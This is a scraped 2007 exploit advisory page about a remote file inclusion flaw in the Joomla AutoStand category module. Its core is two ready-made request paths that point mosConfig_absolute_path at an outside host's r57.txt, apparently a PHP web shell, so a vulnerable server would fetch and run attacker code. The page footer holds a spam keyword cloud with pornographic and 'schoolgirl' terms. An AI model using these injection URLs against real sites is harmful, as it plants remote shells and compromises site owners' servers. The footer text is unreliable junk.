about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Joomla Module AutoStand 1.0 Remote File Inclusion Vulnerability




2007-04-15 Joomla Module AutoStand 1.0 Remote File Inclusion Vulnerability
Rated as : High Risk

=======================================================
Joomla Module AutoStand Category <= 1.1 Remote File include
Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site : 
http://www.joomlafrance.org/telecharger/startdown/AutoStand_Category.html
=======================================================
Description: its a joomla module Shows the categories created
=======================================================

File : /mod_as_category/mod_as_category.php
#  include($mosConfig_absolute_path . 
"/components/com_autostand/languages/portuguese.php  <= line 10

# Don't allow direct acces to the file
  defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not 
allowed.' ); <= line  21+22
========================================================
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================



#Long Life Palestine
#www.Hack-Teach.com

securitydot.net - 2007-04-15

Advertising

Copyright 2007, SecurityDot
Sun, 29 Nov 2009 03:36:39 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.go-so. xxx www+seyx.v Crack Data download s Php Safe- Crack+Data viedo homosexclu webcomm photo sex shellcodes BOOB Prue sex Asia carer nmap vios Xxx move doremon Samira pho www.irania www.ziyee. SSL inject PLEAS FREE vBulletin phpBB por ert ty Contenido Pinkworld. schoolgirl www.8jzz.c fuckingpor vista tran karina kap www.njcard ganxijiame microsoft www.qie88. CuteNews Qpopper++4 news for c erin/00 Exploits S soft.jshuw indian sex 200 /compo Www.maroc Sarah azha mambo Remo www.szmldb